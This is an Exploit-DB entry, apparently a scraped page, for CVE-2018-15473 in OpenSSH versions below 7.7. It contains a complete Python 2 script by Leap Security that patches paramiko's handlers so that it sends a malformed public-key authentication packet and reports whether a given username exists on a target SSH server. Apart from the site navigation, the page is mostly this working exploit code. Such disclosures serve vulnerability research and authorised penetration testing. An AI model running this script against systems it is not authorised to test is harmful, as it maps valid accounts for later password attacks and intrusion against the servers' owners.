Online Training

OpenSSH < 7.7 - User Enumeration (2)

EDB-ID:

45939

CVE:

2018-15473

EDB Verified:

Author:

Leap Security

Type:

remote

Exploit: /

Platform:

Linux

Date:

2018-12-04

Vulnerable App:

#!/usr/bin/env python2# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io# Credits: Matthew Daley, Justin Gardner, Lee David Painterimport argparse, logging, paramiko, socket, sys, osclass InvalidUsername(Exception):    pass# malicious function to malform packetdef add_boolean(*args, **kwargs):    pass# function that'll be overwritten to malform the packetold_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[        paramiko.common.MSG_SERVICE_ACCEPT]# malicious function to overwrite MSG_SERVICE_ACCEPT handlerdef service_accept(*args, **kwargs):    paramiko.message.Message.add_boolean = add_boolean    return old_service_accept(*args, **kwargs)# call when username was invalid def invalid_username(*args, **kwargs):    raise InvalidUsername()# assign functions to respective handlersparamiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_acceptparamiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username# perform authentication with malicious packet and usernamedef check_user(username):    sock = socket.socket()    sock.connect((args.target, args.port))    transport = paramiko.transport.Transport(sock)    try:        transport.start_client()    except paramiko.ssh_exception.SSHException:        print '[!] Failed to negotiate SSH transport'        sys.exit(2)    try:        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))    except InvalidUsername:        print "[-] {} is an invalid username".format(username)        sys.exit(3)    except paramiko.ssh_exception.AuthenticationException:        print "[+] {} is a valid username".format(username)# remove paramiko logginglogging.getLogger('paramiko.transport').addHandler(logging.NullHandler())parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')parser.add_argument('target', help="IP address of the target system")parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")parser.add_argument('username', help="Username to check for validity.")if len(sys.argv) == 1:    parser.print_help()    sys.exit(1)args = parser.parse_args()check_user(args.username)

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services

Databases

Exploits Google Hacking Papers Shellcodes

Links

Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics

Sites

OffSec Kali Linux VulnHub

Solutions

Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services

OffSec Resources

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
	Proving Grounds
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services

Movatterモバイル変換

OpenSSH < 7.7 - User Enumeration (2)

EDB-ID:

45939

CVE:

2018-15473

Author:

Leap Security

Type:

remote

Platform:

Linux

Date:

2018-12-04